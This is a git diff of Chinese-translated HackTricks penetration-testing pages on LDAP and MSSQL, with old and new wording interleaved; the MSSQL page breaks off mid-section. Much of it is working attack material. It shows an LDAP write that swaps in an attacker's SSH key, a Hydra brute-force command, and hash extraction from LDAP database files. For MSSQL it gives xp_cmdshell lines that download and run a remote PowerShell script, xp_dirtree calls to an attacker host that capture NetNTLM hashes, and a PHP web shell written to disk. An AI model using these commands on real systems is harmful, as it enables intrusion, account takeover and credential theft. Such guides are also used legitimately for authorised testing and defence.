**默认端口:** 389 和 636ldaps。全局目录ActiveDirectory 中的 LDAP默认在端口 3268 和 3269LDAPS上可用
```
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
```
### LDAP数据交换格式
### LDAP 数据交换格式
LDIFLDAP数据交换格式将目录内容定义为一组记录。它还可以表示更新请求(添加、修改、删除、重命名)。
LDIF (LDAP 数据交换格式) 将目录内容定义为一组记录。它还可以表示更新请求(添加、修改、删除、重命名)。
```bash
dn: dc=local
dc: local
@ -58,13 +59,13 @@ mail: pepe@hacktricks.xyz
phone: 23627387495
```
* 第1-3行定义了顶级域local
* 第5-8行定义了一级域moneycorp (moneycorp.local)
* 第10-16行定义了2个组织单位: dev 和 sales
* 第18-26行创建了一个域对象并分配了带有值的属性
* 第5-8行定义了一级域moneycorp (moneycorp.local)
* 第10-16行定义了2个组织单位dev和sales
* 第18-26行创建了一个域对象并分配了带有值的属性
## 写入数据
请注意,如果您可以修改值,您可能能够执行非常有趣的操作。例如,想象一下,您**可以更改您的用户或任何用户的"sshPublicKey"信息**。如果存在这个属性,那么**ssh很可能正在从LDAP读取公钥**。如果您可以修改用户的公钥,您**将能够以该用户身份登录即使ssh未启用密码身份验证**。
请注意,如果您可以修改值,您可能能够执行非常有趣的操作。例如,想象一下您**可以更改您的用户或任何用户的“sshPublicKey”信息**。如果这个属性存在,那么**ssh很可能是从LDAP读取公钥**。如果您可以修改用户的公钥,您**将能够以该用户身份登录,即使ssh未启用密码验证**。
```bash
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
@ -76,30 +77,30 @@ True
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
## 嗅探明文凭证
## Sniff clear text credentials
如果LDAP在没有SSL的情况下使用您可以在网络中**嗅探明文凭证**。
如果 LDAP 在没有 SSL 的情况下使用,您可以在网络中**嗅探明文凭证**。
此外,您可以在LDAP服务器和客户端之间的网络中执行**中间人攻击**。在这里,您可以进行**降级攻击**,使客户端使用**明文凭证**进行登录。
此外,您可以在**LDAP 服务器和客户端之间**执行**MITM**攻击。在这里,您可以进行**降级攻击**,使客户端使用**明文凭证**进行登录。
**如果使用SSL**,您可以尝试进行**中间人攻击**,就像上面提到的那样,但提供一个**伪造的证书**,如果**用户接受**它,您就能够降级认证方法并再次查看凭证。
**如果使用 SSL**,您可以尝试像上面提到的那样进行**MITM**,但提供一个**虚假证书**,如果**用户接受它**,您将能够降级认证方法并再次查看凭证。
## 匿名访问
## Anonymous Access
### 绕过TLS SNI检查
### Bypass TLS SNI check
根据[**这篇文章**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)只需使用任意域名如company.com访问LDAP服务器他就能够以匿名用户的身份联系LDAP服务并提取信息:
根据[**这篇文章**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)仅通过使用任意域名(如 company.com访问 LDAP 服务器,他能够以匿名用户的身份联系 LDAP 服务并提取信息:
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### LDAP匿名绑定
### LDAP 匿名绑定
[LDAP匿名绑定](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)允许**未经身份验证的攻击者**从域中检索信息,例如完整的用户、组、计算机、用户帐户属性和域密码策略列表。这是一个**传统配置**自Windows Server 2003起只有经过身份验证的用户才被允许发起LDAP请求。\
然而,管理员可能需要**设置特定应用程序以允许匿名绑定**并提供比预期更多的访问权限从而使未经身份验证的用户可以访问AD中的所有对象。
[LDAP 匿名绑定](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) 允许 **未认证的攻击者** 从域中检索信息,例如用户、组、计算机、用户帐户属性和域密码策略的完整列表。这是一种 **遗留配置**,自 Windows Server 2003 起,仅允许经过认证的用户发起 LDAP 请求。\
然而,管理员可能需要 **设置特定应用程序以允许匿名绑定**,并给予超过预期的访问权限,从而使未认证用户能够访问 AD 中的所有对象。
## 有效凭据
如果您有登录LDAP服务器的有效凭据您可以使用以下命令dump有关域管理员的所有信息:
如果您拥有有效的凭据登录到 LDAP 服务器,您可以使用以下命令转储有关域管理员的所有信息:
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
@ -112,7 +113,7 @@ ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authty
### 自动化
使用此方法,您将能够查看**公共信息**(如域名)****
使用此方法,您将能够查看**公共信息**(如域名)**:**
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
@ -120,11 +121,11 @@ nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
<details>
<summary>使用Python进行LDAP枚举</summary>
<summary>查看使用python进行LDAP枚举</summary>
您可以尝试使用Python**连接LDAP并进行枚举无论是否有凭据**`pip3 install ldap3`
您可以尝试使用python **枚举LDAP无论是否使用凭据** `pip3 install ldap3`
首先尝试**无需**凭据连接:
首先尝试**无凭据连接**
```bash
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
@ -133,7 +134,7 @@ nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
True
>>> server.info
```
如果响应为 `True`就像前面的示例一样,您可以从 LDAP 服务器中获取一些**有趣的数据**(如**命名上下文**或**域名**
如果响应为 `True`如前面的示例所示,您可以从以下位置获取一些 **有趣的数据**,例如 **命名上下文****域名** 服务器
```bash
>>> server.info
DSA info (from DSE):
@ -141,13 +142,13 @@ Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
```
一旦您获得命名上下文,您可以进行一些更加令人兴奋的查询。这个简单的查询应该向您显示目录中的所有对象:
一旦你拥有命名上下文,你可以进行一些更有趣的查询。这个简单的查询应该显示目录中的所有对象:
```bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
```
者**转储**整个 LDAP
**dump**整个ldap
```bash
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
@ -157,7 +158,7 @@ True
### windapsearch
[**Windapsearch**](https://github.com/ropnop/windapsearch) 是一个使用 LDAP 查询来枚举 Windows 域中的用户、组和计算机的 Python 脚本
[**Windapsearch**](https://github.com/ropnop/windapsearch) 是一个 Python 脚本,用于通过利用 LDAP 查询从 Windows 域中 **枚举用户、组和计算机**
```bash
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
@ -172,7 +173,7 @@ python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --p
```
### ldapsearch
检查空凭据或验证您的凭据是否有效:
检查空凭据或您的凭据是否有效:
```bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
@ -185,9 +186,9 @@ result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
```
如果发现有关“_bind必须完成_”的内容意味着凭据不正确。
如果你发现某些内容说“_bind 必须完成_”意味着凭据不正确。
您可以使用以下方法提取**域中的所有内容**
你可以使用以下命令从一个域中提取**所有内容**
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
@ -196,7 +197,7 @@ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_
-w My password
-b Base site, all data from here will be given
```
提取**用户**
提取 **用户**
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
@ -205,7 +206,7 @@ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Use
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取**我的信息**
提取 **我的信息**
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
@ -213,11 +214,11 @@ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取 **域用户**
提取 **Domain Users**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取 **Enterprise Admins**
提取 **Enterprise Admins**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
@ -225,18 +226,20 @@ ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Ent
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
提取**远程桌面组**
提取 **Remote Desktop Group**:
```bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
```
要查看是否有访问任何密码您可以在执行其中一个查询后使用grep
要查看您是否可以访问任何密码,您可以在执行其中一个查询后使用 grep
```bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
```
请注意,您在这里找到的密码可能不是真实的...
#### pbis
您可以从这里下载**pbis**[https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/),通常安装在`/opt/pbis`。\
**Pbis**允许您轻松获取基本信息:
您可以从这里下载 **pbis**: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/),它通常安装在 `/opt/pbis`。\
**Pbis** 允许您轻松获取基本信息:
```bash
#Read keytab file
./klist -k /etc/krb5.keytab
@ -284,33 +287,35 @@ done
### Apache Directory
[**从这里下载Apache Directory**](https://directory.apache.org/studio/download/download-linux.html)。您可以在[这里找到如何使用此工具的示例](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s)。
[**从这里下载 Apache Directory**](https://directory.apache.org/studio/download/download-linux.html)。你可以在这里找到[如何使用此工具的示例](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s)。
### jxplorer
您可以在这里下载带有LDAP服务器的图形界面[http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
你可以在这里下载带有 LDAP 服务器的图形界面: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
默认安装在_/opt/jxplorer_
默认安装在: _/opt/jxplorer_
![](<../.gitbook/assets/image (482).png>)
### Godap
您可以在[https://github.com/Macmod/godap](https://github.com/Macmod/godap)访问它
你可以在 [https://github.com/Macmod/godap](https://github.com/Macmod/godap) 访问它
## 通过kerberos进行身份验
## 通过 kerberos 认
使用`ldapsearch`,您可以通过使用参数`-Y GSSAPI`来**针对kerberos而不是通过NTLM进行身份验证**
使用 `ldapsearch` 你可以**通过 kerberos 认证**而不是通过 **NTLM**,使用参数 `-Y GSSAPI`
## POST
如果您可以访问包含数据库的文件可能在_/var/lib/ldap_中。您可以使用以下方法提取哈希值
如果你可以访问包含数据库的文件(可能在 _/var/lib/ldap_ 中)。你可以使用以下命令提取哈希:
```bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
```
您可以将密码哈希(从 '{SSHA}' 到 'structural',不添加 'structural')提供给 john。
### 配置文件
* 通用
* 一般
* containers.ldif
* ldap.cfg
* ldap.conf
@ -328,8 +333,10 @@ cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
* OpenLDAP 目录服务器
* slapd.sas\_at.conf
* slapd.sas\_oc.conf
* Sun ONE Directory Server 5.1
* Sun ONE 目录服务器 5.1
* 75sas.ldif
## HackTricks 自动命令
```
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
@ -368,16 +375,17 @@ Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

180
network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View file

@ -1,18 +1,19 @@
# 1433 - 渗透测试 MSSQL - Microsoft SQL Server
# 1433 - Pentesting MSSQL - Microsoft SQL Server
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -24,9 +25,9 @@
## 基本信息
来自 [维基百科](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server)
来自 [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server):
> **Microsoft SQL Server**由 Microsoft 开发的**关系数据库**管理系统。作为数据库服务器,它是一个软件产品,主要功能是根据其他软件应用程序的请求存储和检索数据这些应用程序可以在同一台计算机上运行,也可以在网络(包括互联网)上的另一台计算机上运行。\\
> **Microsoft SQL Server**一个 **关系数据库** 管理系统,由微软开发。作为数据库服务器,它是一个软件产品,主要功能是根据其他软件应用程序的请求存储和检索数据——这些应用程序可以在同一台计算机上运行,也可以在网络(包括互联网)上的另一台计算机上运行。\\
**默认端口:** 1433
```
@ -34,23 +35,23 @@
```
### **默认 MS-SQL 系统表**
* **master 数据库**: 这个数据库非常重要,因为它记录了 SQL Server 实例的所有系统级细节。
* **msdb 数据库**: SQL Server 代理程序利用这个数据库来管理警报和作业的调度。
* **model 数据库**: 作为 SQL Server 实例上每个新数据库的蓝图,其中任何更改如大小、排序规则、恢复模型等都会在新创建的数据库中得到反映。
* **Resource 数据库**: 一个只读数据库,存放着随 SQL Server 提供的系统对象。这些对象虽然物理上存储在 Resource 数据库中,但在每个数据库的 sys 模式中逻辑呈现。
* **tempdb 数据库**: 用作临时存储区域,用于存放临时对象或中间结果集。
* **master 数据库**: 该数据库至关重要,因为它捕获 SQL Server 实例的所有系统级细节。
* **msdb 数据库**: SQL Server Agent 利用此数据库管理警报和作业的调度。
* **model 数据库**: 作为 SQL Server 实例上每个新数据库的蓝图,任何更改如大小、排序规则、恢复模型等都会在新创建的数据库中反映。
* **Resource 数据库**: 一个只读数据库,存放随 SQL Server 附带的系统对象。这些对象虽然物理存储在 Resource 数据库中,但在每个数据库的 sys 模式中逻辑呈现。
* **tempdb 数据库**: 作为临时存储区域,用于存放瞬态对象或中间结果集。
## 枚举
### 自动枚举
如果你对服务一无所知:
如果你对该服务一无所知:
```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
如果您**没有凭据**可以尝试猜测它们。您可以使用nmap或metasploit。请注意如果您使用现有用户名多次登录失败可能会**锁定帐户**。
如果你**没有** **凭据**,你可以尝试猜测它们。你可以使用 nmap 或 metasploit。小心如果你使用现有用户名多次登录失败你可能会**锁定账户**。
{% endhint %}
#### Metasploit需要凭据
@ -152,14 +153,14 @@ SELECT * FROM sysusers
```
#### 获取权限
1. **可保护资源:** 定义为由 SQL Server 管理的资源,用于访问控制。这些资源分为以下类别
* **服务器** 例如数据库、登录、端点、可用性组和服务器角色。
* **数据库** 例如数据库角色、应用程序角色、架构、证书、全文目录和用户。
* **架构** 包括表、视图、存储过程、函数、同义词等。
2. **权限:** 与 SQL Server 可保护资源相关联的权限,如 ALTER、CONTROL 和 CREATE 可授予给主体。权限的管理发生在两个级别
* **服务器级别** 使用登录
* **数据库级别** 使用用户
3. **主体:** 此术语指被授予权限访问可保护资源的实体。主体主要包括登录和数据库用户。通过授予或拒绝权限,或将登录和用户包含在具有访问权限的角色中来行使对可保护资源的访问控制
1. **可安全性资源:** 定义为由 SQL Server 管理的用于访问控制的资源。这些资源分为
* **服务器** 示例包括数据库、登录、端点、可用性组和服务器角色。
* **数据库** 示例包括数据库角色、应用程序角色、模式、证书、全文目录和用户。
* **模式** 包括表、视图、过程、函数、同义词等。
2. **权限:** 与 SQL Server 可安全性资源相关的权限,如 ALTER、CONTROL 和 CREATE可以授予主体。权限管理发生在两个层级
* **服务器级别** 使用登录
* **数据库级别** 使用用户
3. **主体:** 该术语指被授予可安全性资源权限的实体。主体主要包括登录和数据库用户。对可安全性资源的访问控制通过授予或拒绝权限或通过将登录和用户包含在具备访问权限的角色中来实现
```sql
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
@ -179,12 +180,12 @@ SELECT IS_SRVROLEMEMBER('sysadmin');
Use master
EXEC sp_helprotect 'xp_cmdshell'
```
## 技巧
## Tricks
### 执行操作系统命令
### Execute OS Commands
{% hint style="danger" %}
请注意,能够执行命令,不仅需要启用 **`xp_cmdshell`**,还需要对 **`xp_cmdshell` 存储过程具有 EXECUTE 权限**。您可以使用以下命令查看谁(除了 sysadmins可以使用 **`xp_cmdshell`**
请注意,为了能够执行命令,不仅需要启用 **`xp_cmdshell`**,还需要对 **`xp_cmdshell` 存储过程** 拥有 **EXECUTE 权限**。您可以通过以下方式获取谁(除了 sysadmins可以使用 **`xp_cmdshell`**
```sql
Use master
EXEC sp_helprotect 'xp_cmdshell'
@ -217,9 +218,9 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1
# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
```
### 窃取 NetNTLM 哈希 / 中继攻击
### Steal NetNTLM hash / Relay attack
您应该启动一个 **SMB 服务器** 来捕获在身份验证中使用的哈希(例如 `impacket-smbserver``responder`)。
您应该启动一个 **SMB 服务器** 来捕获用于身份验证的哈希(例如 `impacket-smbserver``responder`)。
```bash
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
@ -232,7 +233,7 @@ sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
```
{% hint style="warning" %}
您可以通过以下方式检查除系统管理员之外谁具有运行这些 MSSQL 函数的权限
您可以检查除了 sysadmins 之外,谁有权限运行这些 MSSQL 函数
```sql
Use master;
EXEC sp_helprotect 'xp_dirtree';
@ -241,7 +242,7 @@ EXEC sp_helprotect 'xp_fileexist';
```
{% endhint %}
使用**responder****Inveigh** 等工具可以**窃取 NetNTLM 哈希**。\
使用工具**responder****Inveigh** 可以 **窃取 NetNTLM 哈希**。\
您可以查看如何使用这些工具:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
@ -250,7 +251,7 @@ EXEC sp_helprotect 'xp_fileexist';
### 滥用 MSSQL 受信任链接
[**阅读此文章**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **以获取有关如何滥用此功能的更多信息:**
[**阅读此帖子**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **以获取有关如何滥用此功能的更多信息:**
{% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %}
[abusing-ad-mssql.md](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md)
@ -258,7 +259,7 @@ EXEC sp_helprotect 'xp_fileexist';
### **写入文件**
要使用 `MSSQL` 写入文件,我们**需要启用** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option),这需要管理员权,然后执行一些存储过程来创建文件:
要使用 `MSSQL` 写入文件,我们 **需要启用** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option),这需要管理员权,然后执行一些存储过程来创建文件:
```bash
# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
@ -276,9 +277,9 @@ EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
```
### **使用 OPENROWSET 读取文件**
### **使用** OPENROWSET **读取文件**
默认情况下,`MSSQL` 允许对操作系统中帐户具有读取访问权限的任何文件进行读取。我们可以使用以下 SQL 查询:
默认情况下,`MSSQL` 允许对**操作系统中任何具有读取权限的文件进行读取**。我们可以使用以下 SQL 查询:
```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```
@ -287,19 +288,19 @@ SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_C
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
```
#### 基于错误的 SQLi 向量:
#### 基于错误的SQLi向量
```
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
```
### **RCE/读取文件执行脚本Python和R**
### **RCE/读取文件执行脚本Python R**
MSSQL可以允许您执行**Python和/或R中的脚本**。这些代码将由一个**不同的用户**执行,而不是使用**xp\_cmdshell**来执行命令的用户
MSSQL 可能允许您执行 **Python 和/或 R 的脚本**。这些代码将由与使用 **xp\_cmdshell** 执行命令的 **不同用户** 执行
尝试执行一个**'R'** _"Hellow World!"_ **不起作用**的示例
尝试执行 **'R'** _"Hellow World!"_ **不工作**
![](<../../.gitbook/assets/image (393).png>)
使用配置的Python执行多个操作的示例
使用配置的 Python 执行多个操作的示例:
```sql
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
@ -315,9 +316,9 @@ GO
```
### 读取注册表
Microsoft SQL Server提供了多个扩展存储过程允许您与网络、文件系统甚至[Windows注册表](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server)进行交互:
Microsoft SQL Server 提供了 **多个扩展存储过程**,允许您与网络、文件系统甚至 [**Windows 注册表**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)** 进行交互:**
| **常规** | **实例感知** |
| **常规** | **实例感知** |
| ---------------------------- | -------------------------------------- |
| sys.xp\_regread | sys.xp\_instance\_regread |
| sys.xp\_regenumvalues | sys.xp\_instance\_regenumvalues |
@ -338,21 +339,23 @@ Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
```
### 通过 MSSQL 用户定义函数 SQLHttp 实现 RCE
For **更多示例** 请查看 [**原始来源**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/).
可以在 MSSQL 中使用自定义函数加载 .NET dll。然而这需要 `dbo` 访问权限,因此您需要一个作为 `sa` 或管理员角色连接到数据库。
### RCE与MSSQL用户定义函数 - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
可以通过自定义函数在MSSQL中**加载.NET dll**。然而,这**需要`dbo`访问权限**,因此您需要以**`sa`或管理员角色**连接到数据库。
[**点击此链接**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) 查看示例。
### 其他 RCE 方法
### 其他RCE方法
